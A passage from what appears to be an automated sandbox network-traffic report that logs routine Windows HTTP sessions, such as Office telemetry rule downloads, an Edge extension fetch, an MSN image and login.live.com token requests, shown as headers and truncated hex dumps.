                                                                                                                                                                                                                                                        2024-11-20 23:49:55 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        120192.168.2.54990913.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:55 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:55 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                        x-ms-request-id: 83e33b00-401e-00a3-159b-3b8b09000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234955Z-r1d97b9957747b9jhC1TEBgyec00000009m000000000pd3y
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:55 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        121192.168.2.54991223.55.235.2514437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:55 UTC614OUTGET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732751372&P2=404&P3=2&P4=Gj2rnMI4FwnLoclpushBmbTRr64moPmT2PDMZwaZfWoSyaUOglcV8V5p0GE7RmNrwNrOdNPs%2fXuh4t7Cf27Hmw%3d%3d HTTP/1.1
                                                                                                                                                                                                                                                        Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        MS-CV: PJ7BWrT32cUjzmwscWiumN
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC1244INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                        Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        ETag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                        X-AspNetMvc-Version: 5.3
                                                                                                                                                                                                                                                        MS-CorrelationId: 07bad59a-eed9-424e-929b-ce3cf6d529eb
                                                                                                                                                                                                                                                        MS-RequestId: cb54530a-377c-4d22-8053-cae96d727636
                                                                                                                                                                                                                                                        MS-CV: 50eXsKyis2oVdYu8XQSUff.0
                                                                                                                                                                                                                                                        X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                        X-Powered-By: ARR/3.0
                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                        Content-Length: 11185
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=86344
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:56 GMT
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Akamai-Request-BC: [a=23.54.161.79,b=76129944,c=g,n=US_NJ_NEWARK,o=20940],[c=c,n=US_NJ_NEWARK,o=20940]
                                                                                                                                                                                                                                                        MSREGION:
                                                                                                                                                                                                                                                        X-CCC:
                                                                                                                                                                                                                                                        X-CID: 3
                                                                                                                                                                                                                                                        Akamai-GRN: 0.4fa13617.1732146596.489a698
                                                                                                                                                                                                                                                        Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,POST,OPTIONS
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC11185INData Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20
                                                                                                                                                                                                                                                        Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        122192.168.2.54991523.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC506OUTGET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC550INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t
                                                                                                                                                                                                                                                        Last-Modified: Fri, 01 Nov 2024 15:19:08 GMT
                                                                                                                                                                                                                                                        X-Source-Length: 17955
                                                                                                                                                                                                                                                        X-Datacenter: northeu
                                                                                                                                                                                                                                                        X-ActivityId: d2440427-50e1-4b1e-9511-bbaa45a53b32
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Length: 8192
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=315360
                                                                                                                                                                                                                                                        Expires: Sun, 24 Nov 2024 15:25:56 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:56 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01
                                                                                                                                                                                                                                                        Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        123192.168.2.54991113.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:56 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                        x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234956Z-178bfbc474b9fdhphC1NYCac0n00000000qg0000000027eu
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        124192.168.2.54991340.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 4775
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:48:57 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C555_BL2
                                                                                                                                                                                                                                                        x-ms-request-id: 527ba511-7761-4090-b619-af4eec30f60c
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: BL02EPF0001D766 V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:56 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 1918
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        125192.168.2.54991440.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 4775
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:48:57 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C515_BL2
                                                                                                                                                                                                                                                        x-ms-request-id: 79c9d60f-3b66-43b9-acdd-98fa7fcea106
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: BL02EPF0001D734 V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:57 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 11409
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC11409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        126192.168.2.54991913.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:56 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:57 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                        x-ms-request-id: 4f8e9926-c01e-00ad-7c8c-3aa2b9000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234957Z-1777c6cb7544n7p6hC1TEByvb40000000aa000000000yurq
